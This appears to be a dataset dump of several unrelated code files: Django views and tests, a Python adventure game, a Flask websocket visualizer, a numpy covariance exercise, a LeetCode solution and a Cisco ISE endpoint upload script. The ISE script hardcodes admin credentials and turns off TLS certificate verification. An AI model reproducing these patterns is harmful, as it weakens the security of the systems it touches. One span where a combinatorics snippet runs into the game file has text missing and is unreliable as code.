request.user.pk:\n #lasketaan haastetun tähän haasteeseen vastaavien harjoitusten kestot yhteen:\n exercisesOther = Exercise.objects.values('exercise').annotate(Sum('duration')).filter(exercise=c.exercise, date__gte=c.dateFrom, date__lte=c.dateTo, person__pk=c.personChallenged.pk)\n else:\n exercisesOther = Exercise.objects.values('exercise').annotate(Sum('duration')).filter(exercise=c.exercise, date__gte=c.dateFrom, date__lte=c.dateTo, person__pk=c.challengedBy.pk)\n for e in exercisesOwn:\n if e['duration__sum']>=c.duration:\n messages.success(request, 'Onneksi olkoon! Olet täyttänyt haasteen, jonka sinulle antoi {}!'.format(c.challengedBy.first_name))\n progression.append({'challenge_id':c.id, 'done': e['duration__sum'], 'to_do': c.duration - e['duration__sum'] })\n for e in exercisesOther:\n progressionOther.append({'challenge_id':c.id, 'done': e['duration__sum'], 'to_do': c.duration - e['duration__sum'] })\n\n return render(request, 'my_page.html', {'user': request.user, 'challenges': challenges, 'progression': progression, 'progressionOther': progressionOther, 'employerChallenge': employerChallenge})\n\n@login_required\ndef addExercise(request):\n if request.method == \"POST\":\n form = ExerciseForm(request.POST)\n if form.is_valid():\n exercise = form.save(commit=False)\n exercise.person = request.user\n exercise.save()\n messages.info(request, 'Suorituksen tallentaminen onnistui!')\n return redirect('/lisaa-uusi')\n else:\n form = ExerciseForm()\n \n return render(request, 'add_exercise.html', {'form': form })\n\n@login_required\ndef challenge(request):\n if request.method == \"POST\":\n form = ChallengeForm(request.POST)\n if form.is_valid():\n challenge = form.save(commit=False)\n challenge.challengedBy = request.user\n challenge.save()\n messages.info(request, 'Haaste välitetty!')\n return redirect('/haasta')\n else:\n form = ChallengeForm()\n \n return render(request, 'challenge.html', {'form': form })\n\n@login_required\ndef secret(request):\n return HttpResponse(\"Salainen sivu\")","sub_path":"exercises/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8288,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"290503282","text":"from functools import lru_cache\nimport sys\nmod=1000000007\n\nn,k=[int(i) for i in input().split(\" \")]\n\nfacts=[1 for i in range(n+k+1)]\n\nfor i in range(1,n+k+1):\n facts[i]=i*facts[i-1]\n\n@lru_cache()\ndef combination(i,j):\n return facts[i]//(facts[j]*facts[i-j])\n\nif n= mapSize**2: #if cleaned every tile (mapSize squared)\n endGame()\n\nclass Recipe: #class for recipes\n def __init__(self,required,crafted):\n self.required = required #list of items needed\n self.crafted = crafted #what is made\n \n def craft(self): #craft the recipe's item\n tempInv = player.inventory.copy()\n for requirement in self.required:\n try:\n tempInv.remove(requirement)\n except:\n output(\"You don't have a %s!\"%requirement.name.lower())\n return #can't craft something if you don't have the requirements\n \n player.inventory = tempInv.copy()\n \n output(\"Crafted a \"+self.crafted.name.lower())\n player.inventory.append(self.crafted) #add the item\n \n def description(self): #description of the recipe\n desc = \"To craft the %s you need: \"%self.crafted.name.lower()\n for requirement in self.required:\n if(self.required.count(requirement) == 1):\n desc += \"\\n%s\"%requirement.name.lower() \n else:\n desc += \"\\n%s x%i\"%(requirement.name.lower(),self.required.count(requirement))\n break\n return desc\n\"\"\"\nfunctions\n\"\"\"\ndef output(text): #set output label text to something\n app.setLabel(\"output\",\"%s\\n%s\"%(app.getLabel(\"output\"),text))\n\ndef loot(): #add a random item to the inventory\n item = random.choice(items)\n output(\"You pick up a \"+item.name)\n player.inventory.append(item)\n\ndef endGame(): #what to do when game finishes\n app.removeAllWidgets()\n app.addLabel(\"endText\",\"You've saved the planet!\")\n\n\"\"\"\nsaving/loading functions\n\"\"\"\ndef saveMap(): #save map\n try:\n file = open(\"map.txt\",\"wb\")\n pickle.dump(gameMap, file)\n file.close()\n except:\n output(\"Unable to save map\")\n \ndef saveStats(): #save player stats\n try:\n file = open(\"player.txt\",\"wb\")\n pickle.dump(player,file)\n file.close() \n except:\n output(\"Unable to save player file\")\n\ndef saveAll(): #save everything\n output(\"Game saved\")\n saveMap()\n saveStats()\n \ndef load(): #load player stats and map\n global gameMap, player\n try: #don't open files that don't exist\n file = open(\"map.txt\",\"rb\")\n gameMap = pickle.load(file)\n file.close()\n except: #create a map if no file found (file will be created when it's saved)\n generateMap()\n \n try: #don't open files that don't exist\n file = open(\"player.txt\",\"rb\")\n player = pickle.load(file)\n file.close()\n except: #create player with default stats if no file found (file will be created when it's saved)\n player = Player(\"Player\",#name\n 10,#health\n 5,#damage\n 0,#armor\n [\"slashes\",\"stabs\"],#attack types\n round(mapSize/2),#x position\n round(mapSize/2),#y position\n []#inventory\n )\n \n output(\"Game loaded\")\n updateMap() #update map at end because player pos might have changed\n\ndef startGame(widget): #do stuff based on button chosen\n if (widget == \"Continue\"):\n load()\n \n elif (widget == \"New Game\"):\n generateMap()\n \n #save/load menu, added after game is started so people don't save when nothing is made\n \n app.addMenuItem(\"File\", \"Save\", func=saveAll)\n app.addMenuItem(\"File\", \"Load\", func=load) \n \n app.setTabbedFrameDisableAllTabs(\"main\", disabled=False)\n app.setTabbedFrameDisabledTab(\"main\", \"combat\", disabled=True)\n app.hideTabbedFrameTab(\"main\",\"title\")\n app.setTabbedFrameDisabledTab(\"main\", \"title\", disabled=True)\n\n\n\"\"\"\nmap functions\n\"\"\"\ndef generateMap(): #create new map\n for y in range(mapSize):\n gameMap.append([])\n for x in range(mapSize):\n gameMap[y].append(random.choice(biomes)) #add a random biome for each tile\n gameMap[player.posY][player.posX].clean() #'clean' the starting biome\n updateMap()\n #saveMap() #save the map once it's generated\n\ndef updateMap(): #clear all the tiles on the map and readd them\n app.clearCanvas(\"map\")\n a = 0\n for y in gameMap:\n b=0 \n for x in y:\n name = str(b)+\" \"+str(a) # \"x y\" so we can change the tiles later\n \n map.create_rectangle(b*iconSize, a*iconSize, b*iconSize+iconSize, a*iconSize+iconSize, fill=x.color, width=0, tags=[name]) #x1, y1, x2, y2, color\n map.create_text((b*iconSize)+(iconSize/2), (a*iconSize)+(iconSize/2), text = x.icon, tags=[name])\n b+=1\n a+=1\n \n #create and move to player tile\n map.create_rectangle(player.posX*iconSize, player.posY*iconSize, player.posX*iconSize+iconSize-1, player.posY*iconSize+iconSize-1,fill=player.color,tags=\"player\") \n map.create_text((player.posX*iconSize)+(iconSize/2), (player.posY*iconSize)+(iconSize/2),text = player.icon,tags=\"player\") \n map.xview_moveto((player.posX-5)/(mapSize+2)) #show player position + 5 tiles to the left\n map.yview_moveto((player.posY-5)/(mapSize+2)) #show player position + 5 tiles up \n\ndef updateTile(x,y):\n biome = gameMap[y][x]\n name = str(x)+\" \"+str(y)\n for t in map.find_withtag(name):\n if(map.type(t) == \"rectangle\"):\n map.itemconfig(t,fill=biome.color)\n elif(map.type(t) == \"text\"):\n map.itemconfig(t,text=biome.icon)\n\n\"\"\"\ninput related functions\n\"\"\"\ndef onMove(): #things to do when the player moves\n #move map to where player is\n map.xview_moveto((player.posX-5)/(mapSize+2))\n map.yview_moveto((player.posY-5)/(mapSize+2))\n \n event = random.randint(1,4)\n if(event == 1): #1 in 4 chance of starting combat\n startCombat() \n elif(event == 2):\n loot()\n else:#2 in 4 chance of no event\n pass\n gameMap[player.posY][player.posX].clean() #'clean' the biome once you've done something\n\ndef rebind(): #rebinds the arrow keys because scrolling on the pane messes it up\n app.unbindKeys([\"Left\",\"Right\",\"Up\",\"Down\"])\n app.bindKeys([\"Left\",\"Right\",\"Up\",\"Down\"], keys)\n\ndef keys(key): #what to do whenever a key is pressed\n currentTab = app.getTabbedFrameSelectedTab(\"main\") #find the current tab\n \n if(currentTab == \"map\"): #movement on map\n playerObj = map.find_withtag(\"player\") #get all canvas objects with 'player' tag\n if(key == \"Left\"):\n if(player.posX != 0): #prevent going off the map\n player.posX -= 1\n for p in playerObj:\n map.move(p,-iconSize,0) #move object x, y\n onMove()\n elif(key == \"Right\"):\n if(player.posX != mapSize-1): #prevent going off the map\n player.posX += 1\n for p in playerObj:\n map.move(p,iconSize,0)\n onMove()\n elif(key == \"Up\"):\n if(player.posY != 0): #prevent going off the map\n player.posY -= 1 \n for p in playerObj:\n map.move(p,0,-iconSize)\n onMove()\n elif(key == \"Down\"):\n if(player.posY != mapSize-1): #prevent going off the map\n player.posY += 1\n for p in playerObj:\n map.move(p,0,iconSize)\n onMove()\n \n \n elif(currentTab == \"combat\"): #only work on combat tab\n if(key in [\"a\",\"b\",\"r\"]):#only get attacked when using keys related to combat \n global currentEnemy\n enemyAttacks = (random.random() > 0.5) #50% chance enemy attacks\n if(key == \"a\"):\n damage = max(player.damage - currentEnemy.armor,1) #prevent negative damage\n currentEnemy.health -= damage\n output(player.attackDesc(currentEnemy,damage))\n if(enemyAttacks):\n damage = max(currentEnemy.damage - player.armor,1) #prevent negative damage\n player.health -= damage\n output(currentEnemy.attackDesc(player,damage))\n \n elif(key == \"b\"):\n output(\"You block the %s's attack!\"%currentEnemy.name)\n \n elif(key == \"r\"):\n if(enemyAttacks):\n damage = max(currentEnemy.damage - player.armor,1) #prevent negative damage\n player.health -= damage\n output(currentEnemy.attackDesc(player,damage)) \n else:\n endCombat() #end combat with no winner\n \n \n updateCombat() #update labels to show info\n \n if(player.health <= 0):\n endCombat(\"enemy\")\n elif(currentEnemy.health <= 0):\n endCombat(\"player\") \n #saveStats()\n\n\n\"\"\"\ninventory functions\n\"\"\"\ndef updateInventory(): #add labels for all the items in the player's inventory and what they have equipped\n if(app.getTabbedFrameSelectedTab(\"main\") != \"inventory\"): #dont bother updating inventory labels if not on the tab\n return\n app.openFrame(\"items\")\n app.emptyCurrentContainer()\n for i in player.inventory:\n try: #in case there are multiple of the same item\n app.addLabel(i,i.name)\n app.setLabelTooltip(i, i.description())\n app.setLabelRelief(i,\"raised\")\n app.setLabelSubmitFunction(i, itemSelect) #what to do when label is clicked\n except: #if multiple of the same item set the label to show the amount\n app.setLabel(i,\"%s x%i\"%(i.name,player.inventory.count(i))) #Thing xNum\n app.stopFrame()\n \n \n for slot in player.equipped:\n item = player.equipped[slot]\n if item != None: #make sure it's an actual equipment\n app.setLabel(slot,item.name)\n app.setLabelTooltip(slot, item.description())\n else:#if no item equipped in slot\n app.setLabel(slot,\"Nothing\")\n app.setLabelTooltip(slot, \"\")\n\n\ndef itemSelect(widget): #equip item that is clicked by mouse\n player.equip(widget)\n\n\ndef showRecipe(widget): #change the label to show information on recipe\n app.openFrame(\"craftInfo\")\n app.emptyCurrentContainer()\n app.addLabel(\"craftDesc\",widget.description())\n app.addButton(\"craft\",widget.craft)\n app.stopFrame()\n\n\"\"\"\ncombat functions\n\"\"\"\ndef updateCombat(): #set labels/meters to match new stats\n app.setMeter(\"playerHealth\",100*player.health/player.maxHealth,text=player.health)\n app.setLabel(\"playerDamage\",\"Damage: %i\"%player.damage)\n app.setLabel(\"playerArmor\",\"Armor: %i\"%player.armor)\n \n app.setLabel(\"enemyName\",\"%s\"%currentEnemy.name)\n app.setMeter(\"enemyHealth\",100*currentEnemy.health/currentEnemy.maxHealth,text=currentEnemy.health)\n app.setLabel(\"enemyDamage\",\"Damage: %i\"%currentEnemy.damage)\n app.setLabel(\"enemyArmor\",\"Armor: %i\"%currentEnemy.armor)\n\ndef startCombat(): #start combat by generating an enemy and disabling unrelated tabs\n global currentEnemy\n if not (gameMap[player.posY][player.posX].enemies):\n return\n currentEnemy = random.choice(gameMap[player.posY][player.posX].enemies) #choose an enemy from the biome the player is in\n currentEnemy.maxHealth += round(random.uniform(-currentEnemy.maxHealth/2,currentEnemy.maxHealth/2)) #add some variation on their health between 0.5 and 1.5 times \n currentEnemy.health = currentEnemy.maxHealth \n \n player.health = player.maxHealth #reset player health\n \n app.setTabbedFrameDisabledTab(\"main\",\"map\", True) #disable all other tabs\n app.setTabbedFrameDisabledTab(\"main\",\"inventory\", True)\n app.setTabbedFrameDisabledTab(\"main\",\"crafting\", True)\n app.setTabbedFrameDisabledTab(\"main\",\"combat\", False) #enable combat tab \n\n app.setTabbedFrameSelectedTab(\"main\",\"combat\",False) #go to combat tab\n \n updateCombat()\n \ndef endCombat(winner=\"none\"):#end the combat with default value of no winner\n \n app.setTabbedFrameDisabledTab(\"main\",\"map\", False) #go back to normal tabs\n app.setTabbedFrameDisabledTab(\"main\",\"inventory\", False) \n app.setTabbedFrameDisabledTab(\"main\",\"crafting\", False)\n app.setTabbedFrameDisabledTab(\"main\",\"combat\", True) \n\n app.setTabbedFrameSelectedTab(\"main\",\"map\",False) \n \n #do stuff based on who won\n if(winner == \"enemy\"):\n output(\"You lost\")\n elif(winner == \"player\"):\n output(\"You win\")\n player.maxHealth += 1 #add one to player's health each time they win\n loot()\n elif(winner == \"none\"): #player ran away\n output(\"You managed to run away\")\n else: #shouldn't ever happen but just in case\n output(\"Something went wrong\")\n\n\n\"\"\"\nvariables\n\"\"\"\n#biome list\nbiomes = [\n Biome(\"toxic dump\",\"gold\",\"-\",[Mob(\"Toxic Sludge\",5,5,0,[\"glomps\",\"slops\"])],Biome(\"plains\",\"limegreen\",\"-\",None)), #toxic dump cleans to plains\n Biome(\"wasteland\",\"coral\",\"⁕\",[Mob(\"Radscorpion\",25,15,5,[\"stings\",\"claws\"])],Biome(\"desert\",\"palegoldenrod\",\"⁕\",None)), #wasteland cleans to desert\n Biome(\"burnt forest\",\"sienna\",\"⇑\",[Mob(\"Burning Gorilla\",5,25,9,[\"burns\",\"clubs\"])],Biome(\"forest\",\"seagreen\",\"⇑\",None)), #burnt forest cleans to forest\n Biome(\"polluted ocean\",\"darkorchid\",\"≈\",[Mob(\"Plastic Kraken\",50,50,10,[\"stings\",\"claws\"])],Biome(\"ocean\",\"dodgerblue\",\"≈\",None)) #polluted ocean cleans to ocean\n ]\n\n#list of every item\nitems = [\n Weapon(\"Sword\",\"A stabby metal object\",11,[\"Slash\",\"Stab\"]),\n Armor(\"Chestplate\",\"A large hunk of metal\",27,\"body\"),\n Weapon(\"Big Sword\",\"A big stabby metal object\",1000,[\"Smash\",\"Slam\"]),\n Item(\"Scrap Metal\",\"A piece of scrap metal\")\n ]\n\n#list of every recipe\n#need to use index of the item in the items list so that the Item object is correct\nrecipes = [\n Recipe([items[0],items[3],items[3],items[3],items[3],items[3]],items[2]),#create big sword with sword and 5 scrap metal\n Recipe([items[3],items[3]],items[1]),#create chestplate with 2 scrap metal\n Recipe([items[3]],items[0])#create sword with 1 scrap metal\n ] \n\niconSize = 20 #size of each tile on the map in pixels\ngameMap = []\nmapSize = 50 #size of the map\n\n#player stats\nplayer = Player(\"Player\",#name\n 10,#health\n 5,#damage\n 0,#armor\n [\"slashes\",\"stabs\"],#attack types\n round(mapSize/2),#x position\n round(mapSize/2),#y position\n []#inventory\n )\n\n#enemy that's being fought\ncurrentEnemy = Mob(\"Enemy\",#name\n 1,#health\n 1,#damage\n 1,#armor\n [\"jabs\",\"claws\"]#attack types\n )\n\n\n\n\"\"\"\nsetup and start gui\n\"\"\"\napp = gui(\"Waste Adventure\")\napp.setSticky(\"nesw\")\napp.setStretch(\"both\")\n\n\n\n\n\n#tabs in the gui\napp.startTabbedFrame(\"main\")\napp.setTabbedFrameTabExpand(\"main\", expand=True) #expand to fit whole gui\napp.setTabbedFrameChangeCommand(\"main\", updateInventory) #when changing tab call updateInventory(), a return in that function prevents it from happening on wrong tab\n\n\n#title tab\napp.startTab(\"title\")\napp.setStretch('column')\napp.setSticky('esw')\napp.addLabel(\"title\", \"Waste Adventure\")\n\nif(os.path.isfile('./map.txt')):#don't create continue button if no file to load\n if(os.path.isfile('./player.txt')):\n app.addButton(\"Continue\", startGame) #load save\napp.addButton(\"New Game\", startGame) #create new save\napp.stopTab()\n\n#File menu for saving/loading, functions added after game is started\napp.createMenu(\"File\")\n\n#map tab\napp.startTab(\"map\")\nmap = app.addCanvas(\"map\")\nmap.config(scrollregion=(0,0,(mapSize+2)*iconSize,(mapSize+2)*iconSize)) #x1, y1, x2, y2, height,height=(iconSize*11)+1\napp.stopTab()\n\n\n#inventory tab\napp.startTab(\"inventory\") #items in inventory\napp.startFrame(\"items\",row=0,column=0)\napp.stopFrame()\n\napp.addVerticalSeparator(row=0,column=1)\n\napp.startFrame(\"equipped\",row=0,column=2) #equipped items\nitemRow = 0\nfor slot in player.equipped: #create a label for each equipment slot\n app.addLabel(\"%s title\"%slot,slot.capitalize(),row=itemRow,column=2)\n app.addLabel(slot,player.equipped[slot],row=itemRow,column=3)\n app.setLabelRelief(slot,\"ridge\")\n app.setLabelTooltip(slot, player.equipped[slot])\n app.setLabelSubmitFunction(slot, player.unEquip) #unequip on click\n \n itemRow += 1\napp.stopFrame()\napp.stopTab()\n\n\n\n#crafting tab\napp.startTab(\"crafting\")\napp.startFrame(\"recipes\",row=0,column=0)\nfor recipe in recipes: #recipe list doesn't change so only needs to be done at start of gui\n app.setSticky(\"ew\") \n app.addLabel(recipe,recipe.crafted.name)\n app.setLabelTooltip(recipe, recipe.description())\n app.setLabelRelief(recipe,\"raised\")\n app.setLabelSubmitFunction(recipe, showRecipe) #on click\napp.stopFrame()\n\napp.addVerticalSeparator(row=0,column=1)\n\napp.startFrame(\"craftInfo\",row=0,column=3)#place where crafting description and button go\napp.stopFrame()\n\napp.stopTab()\n\n\n#combat tab\napp.startTab(\"combat\")\napp.addLabel(\"fight\",\"combat\")\n\n#player side of combat\napp.startFrame(\"player\",row=0,column=0)\napp.addLabel(\"playerName\",\"Player\")\n\napp.addMeter(\"playerHealth\",100)\napp.setMeterFill(\"playerHealth\",\"Green\")\napp.setMeterBg(\"playerHealth\",\"Red\")\n\napp.addLabel(\"playerDamage\",\"Damage\")\napp.addLabel(\"playerArmor\",\"Armor\")\napp.stopFrame()\n\napp.addVerticalSeparator(row=0,column=1)\n\n#enemy side of combat\napp.startFrame(\"enemy\",row=0,column=2)\napp.addLabel(\"enemyName\",\"Name\")\n\napp.addMeter(\"enemyHealth\",100)\napp.setMeterFill(\"enemyHealth\",\"Green\")\napp.setMeterBg(\"enemyHealth\",\"Red\")\n\napp.addLabel(\"enemyDamage\",\"Damage\")\napp.addLabel(\"enemyArmor\",\"Armor\")\napp.stopFrame()\n\napp.stopTab()\n\n\n#help tab\napp.startTab(\"help\")\napp.addLabel(\"helpLabel\",\"\"\"Use the arrow keys to move around the map.\nClick or drag items you want to equip.\nWhen in combat use A to attack, B to block and R to run.\"\"\")\napp.stopTab()\napp.stopTabbedFrame()\n\n\n#output log\napp.startScrollPane(\"outputPane\",row=0,column=3)\napp.addLabel(\"output\",\"\")\napp.stopScrollPane()\n\n\n#disable all tabs but title screen\napp.setTabbedFrameDisableAllTabs(\"main\", disabled=True)\napp.setTabbedFrameDisabledTab(\"main\", \"title\", disabled=False)\n\ngenerateMap()\napp.bindKeys([\"Left\",\"Right\",\"Up\",\"Down\",\"a\",\"b\",\"r\"], keys) #bind these keys to 'keys' function\n\napp.registerEvent(rebind) #every second rebind the arrow keys because scrolling unbinds them\napp.go()","sub_path":"WasteGame.py","file_name":"WasteGame.py","file_ext":"py","file_size_in_byte":23203,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"285296415","text":"import csv\r\nimport json\r\nimport requests\r\nimport urllib3\r\nimport pprint\r\n\r\ndef discover_group(group_name):\r\n url = \"https://10.79.247.86:9060/ers/config/endpointgroup\"\r\n\r\n headers = {\r\n 'accept': \"application/json\",\r\n 'content-type': \"application/json\",\r\n }\r\n\r\n req = requests.get(url, headers=headers, auth=(\"admin\", \"C!sc0123\"), verify=False)\r\n\r\n group_id = []\r\n\r\n if req.status_code == 200:\r\n data = json.loads(req.text)\r\n pp = pprint.PrettyPrinter(indent=3)\r\n # pp.pprint(data.get('SearchResult'))\r\n resource = data.get('SearchResult').get('resources')\r\n for i in group_name:\r\n #print(i.get(\"id\") + i.get(\"name\"))\r\n for j in resource:\r\n if j.get(\"name\") == i:\r\n group_id.append(j.get(\"id\"))\r\n return group_id\r\n\r\ndef deal_csv(csv_file_path):\r\n file = open(csv_file_path, \"r\")\r\n reader = csv.reader(file)\r\n mac_list = []\r\n group_list = []\r\n\r\n for i in reader:\r\n #print(i[0][:] + i[1])\r\n mac_list.append(i[0][:-1])\r\n group_list.append(i[1])\r\n return mac_list, group_list\r\n\r\ndef post_all_endpints(mac_list, group_list):\r\n url = \" https://10.79.247.86:9060/ers/config/endpoint\"\r\n\r\n headers = {\r\n 'accept': \"application/json\",\r\n 'content-type': \"application/json\",\r\n }\r\n\r\n json_list = []\r\n count = 0\r\n for i in mac_list:\r\n json_format = '''{{\"ERSEndPoint\" : {{\"mac\" : \"{}\",\"groupId\" : \"{}\",\"staticGroupAssignment\" : true}}}}'''.format(i,group_list[count])\r\n json_list.append(json_format)\r\n count = count+1\r\n\r\n print(json_list)\r\n\r\n for j in json_list:\r\n req = requests.post(url, headers=headers, auth=(\"admin\", \"C!sc0123\"), verify=False, data=j)\r\n print(req.status_code)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n\r\n urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\r\n #print(discover_group(\"Meralco_Printer\"))\r\n # print(deal_csv(\"endpoints.csv\")[0])\r\n mac_list = deal_csv(\"endpoints.csv\")[0]\r\n group_list = deal_csv(\"endpoints.csv\")[1]\r\n print(mac_list)\r\n print(group_list)\r\n print(discover_group(group_list))\r\n group_list_id_list = discover_group(group_list)\r\n post_all_endpints(mac_list, group_list_id_list)\r\n","sub_path":"Devnet/study/ISE_Endpoints_Assign_Group/ISE_endpoint_upload.py","file_name":"ISE_endpoint_upload.py","file_ext":"py","file_size_in_byte":2284,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"346427318","text":"# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution:\n def isPalindrome(self, head: ListNode) -> bool:\n current = head\n new = head\n stack = []\n while current:\n #count +=1\n stack.append(current.val)\n current = current.next\n \n stack.reverse()\n count = 0\n #print(stack)\n for i in stack:\n if(i == new.val):\n new = new.next\n count +=1\n if(count == len(stack)):\n return True\n \n return False\n \n ","sub_path":"Python_leet/leet234.py","file_name":"leet234.py","file_ext":"py","file_size_in_byte":681,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"206497799","text":"import os\nimport sys\nimport json\nimport time\nimport datetime\nimport random\nimport logging\nfrom logging.handlers import RotatingFileHandler\nfrom flask import Flask\nfrom flask import render_template\nfrom flask import jsonify\nfrom flask import request\nfrom gevent import Timeout\nfrom gevent import pywsgi\nfrom geventwebsocket.handler import WebSocketHandler\n\ntry:\n from visualizer.conf import *\n from visualizer.module import *\nexcept:\n from conf import *\n from module import *\n\napp = Flask(__name__)\n\n#-- Error Handler\n@app.errorhandler(500)\ndef error_handler(err):\n response = jsonify({ 'message': err.name, 'result': err.code })\n return response, err.code\n\n\n#-- Application\n@app.route('/')\ndef visualizer():\n socket_host = get_ec2_ip()\n log = get_logfiles()\n html = render_template('index.html', HOST=socket_host, PORT=port, LOG=adjust_c3(log))\n return html\n \n\n@app.route('/socket')\ndef socket():\n if request.environ.get('wsgi.websocket'):\n ws = request.environ['wsgi.websocket']\n app.logger.info('Connection Start.')\n log = get_logfiles()\n try:\n while True:\n with Timeout(frequency, False):\n msg = ws.receive()\n if msg == 'closed':\n break\n diff_log = get_diff_logfiles(log)\n log = get_logfiles()\n if diff_log is not None:\n app.logger.info(diff_log)\n ws.send(json.dumps(adjust_c3(log)))\n app.logger.info('Sent to Web Socket!')\n except Exception as e:\n app.logger.error(e.args)\n finally:\n app.logger.info('Connection Closed.')\n ws.close()\n \n return 'Closed.'\n\n@app.route('/parameters')\ndef data():\n return get_parameter()\n\n\ndef main():\n handler = RotatingFileHandler(os.path.join(visualizer_home_path, 'var/flask.log'), maxBytes=10000, backupCount=1)\n handler.setLevel(logging.INFO)\n app.logger.addHandler(handler)\n app.debug = debug\n server = pywsgi.WSGIServer((host, port), app, handler_class=WebSocketHandler)\n server.serve_forever()\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":2200,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"38827895","text":"import numpy as np\nfrom numpy.linalg import inv\n\nnp.set_printoptions(precision=4)\nnp.set_printoptions(suppress=True)\nnp.set_printoptions(formatter={'float': '{: 0.3f}'.format})\n\nX = np.array([[42, 4],\n [52, 5],\n [48, 4],\n [58, 3]]\n )\n\nc1, c2 = X[:, 0], X[:, 1]\nnum_r, num_c = X.shape[0], X.shape[1]\n\n# --Mean--\nmean = np.mean(X, axis=0)\nprint(\"--Mean--\")\nprint(mean)\n\n# --Covariance--\nS = np.cov(X.T)\nprint(\"--Covariance 0--\")\nprint(S)\n\n# c = np.vstack([c1, c2])\n# cov3 = np.cov(c)\n\n# default normalization (False) is by (N - 1)\nS = np.cov(c1, c2)\nprint(\"--Covariance 1--\")\nprint(S)\n\nS0 = np.cov(c1, c2, bias=True)\nprint(\"--Covariance 2--\")\nprint(S0)\n\nX_ = X - mean # center the data\nS = np.dot(X_.T, X_) / (num_r)\nprint(\"--Covariance 3--\")\nprint(S)\n\nnp.testing.assert_array_equal(S, S0)\n######\n# Expected value function.\n\n\ndef E(x, p):\n expectedValue = 0\n for i in np.arange(0, np.size(x)):\n expectedValue += x[i] * (p[i] / np.size(x))\n return expectedValue\n\n# Covariance coefficient function.\n\n\ndef covariance(x, y):\n '''\n Calculate the product of the multiplication for each pair of variables\n values.\n '''\n xy = x * y\n\n # Calculate the expected values for each variable and for the XY.\n Ex = E(x, np.ones(np.size(x)))\n Ey = E(y, np.ones(np.size(y)))\n Exy = E(xy, np.ones(np.size(xy)))\n\n # Calculate the covariance coefficient.\n return Exy - (Ex * Ey)\n\nS = np.array([[covariance(c1, c1), covariance(c1, c2)],\n [covariance(c2, c1), covariance(c2, c2)]])\nprint(\"--Covariance 4--\")\nprint(S)\nnp.testing.assert_array_equal(S, S0)\n\n\n# --Correlation--\nR0 = np.corrcoef(c1, c2)\nprint(\"--Correlation 1--\")\nprint(R0)\n\n\nX_ = X - mean # center the data\nstd = np.std(X, axis=0)\nstdX = X_ / std\nR = np.dot(stdX.T, stdX) / (num_r)\nprint(\"--Correlation 2--\")\nprint(R)\nnp.testing.assert_array_almost_equal_nulp(R, R0)\n\n\n# Converting a Correlation Matrix to a Covariance Matrix\nD = np.diag(std)\nS = D.dot(R).dot(D)\nprint(\"--cov_from_corr 1--\")\nprint(S)\nnp.testing.assert_array_equal(S, S0)\n\n# pre - multiplying by a diagonal matrix, D.dot(CORR1), is the same\n# as multiplying each column by the corresponding standard deviation\n# post-multiplying by a diagonal matrix (that is dot(D)) is the same\n# as multiplying each row by the corresponding standard deviation\nS = (std * R) * std[:, np.newaxis]\nprint(\"--cov_from_corr 2--\")\nprint(S)\nnp.testing.assert_array_equal(S, S0)\n\n\nS = np.dot(std[:, None], std[None, :]) * R\nprint(\"--cov_from_corr 3--\")\nprint(S)\nnp.testing.assert_array_almost_equal_nulp(S, S0)\n\n# Converting a Covariance Matrix to a Correlation Matrix\n\nD = np.sqrt(np.diag(np.diag(S)))\nDInv = inv(D)\nR = DInv.dot(S).dot(DInv)\nprint(\"--corr_from_cov 1--\")\nprint(R)\nnp.testing.assert_array_almost_equal_nulp(R, R0)\n\n\nD = np.sqrt(np.diag(S))\nR = S / D.T / D[:, np.newaxis] # divide columns, then divide rows\nprint(\"--corr_from_cov 2--\")\nprint(R)\nnp.testing.assert_array_almost_equal_nulp(R, R0)\n\n\nR = S / (np.dot(D[:, None], D[None, :]))\nprint(\"--corr_from_cov 3--\")\nprint(R)\nnp.testing.assert_array_almost_equal_nulp(R, R0)\n","sub_path":"MultiJohnson/ex1.2.py","file_name":"ex1.2.py","file_ext":"py","file_size_in_byte":3135,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"84158909","text":"import datetime\n\nfrom django.db.utils import IntegrityError\nfrom django.test import TestCase\n\nfrom main.models import Project\nfrom gifter.models import Pair, Participant, Party, Rule, User\n\n\nclass ProjectModelTest(TestCase):\n\n def test_project_creation(self):\n project = Project.objects.create(name='Test Project', url='test_url')\n self.assertTrue(isinstance(project, Project))\n\n def test_duplicate_project(self):\n Project.objects.create(name='Test Project', url='test_url_1')\n\n with self.assertRaises(IntegrityError):\n Project.objects.create(name='Test Project', url='test_url_2')\n\n def test_duplicate_url(self):\n Project.objects.create(name='Test Project 1', url='test_url')\n\n with self.assertRaises(IntegrityError):\n Project.objects.create(name='Test Project 2', url='test_url')\n\n def test_string_representation(self):\n project = Project.objects.create(name='Test Project', url='test_url')\n self.assertEqual(str(project), project.name)\n\n\nclass UserModelTest(TestCase):\n\n def test_user_creation(self):\n user = User.objects.create(first_name='Dale', last_name='Hammond', email='DaleKHammond@armyspy.com')\n self.assertTrue(isinstance(user, User))\n\n def test_duplicate_email(self):\n User.objects.create(first_name='Dale', last_name='Hammond', email='DaleKHammond@armyspy.com')\n\n with self.assertRaises(IntegrityError):\n User.objects.create(first_name='Dale', last_name='Hammond', email='DaleKHammond@armyspy.com')\n\n def test_string_representation(self):\n user = User.objects.create(first_name='Dale', last_name='Hammond', email='DaleKHammond@armyspy.com')\n self.assertEqual(str(user), user.email)\n\n # test for a bad email\n # test for no email\n\n\nclass ParticipantModelTest(TestCase):\n\n def test_participant_creation(self):\n participant = Participant.objects.create(first_name='Dale', last_name='Hammond',\n email='DaleKHammond@armyspy.com')\n self.assertTrue(isinstance(participant, Participant))\n\n def test_duplicate_participant(self):\n Participant.objects.create(first_name='Dale', last_name='Hammond', email='DaleKHammond@armyspy.com')\n\n with 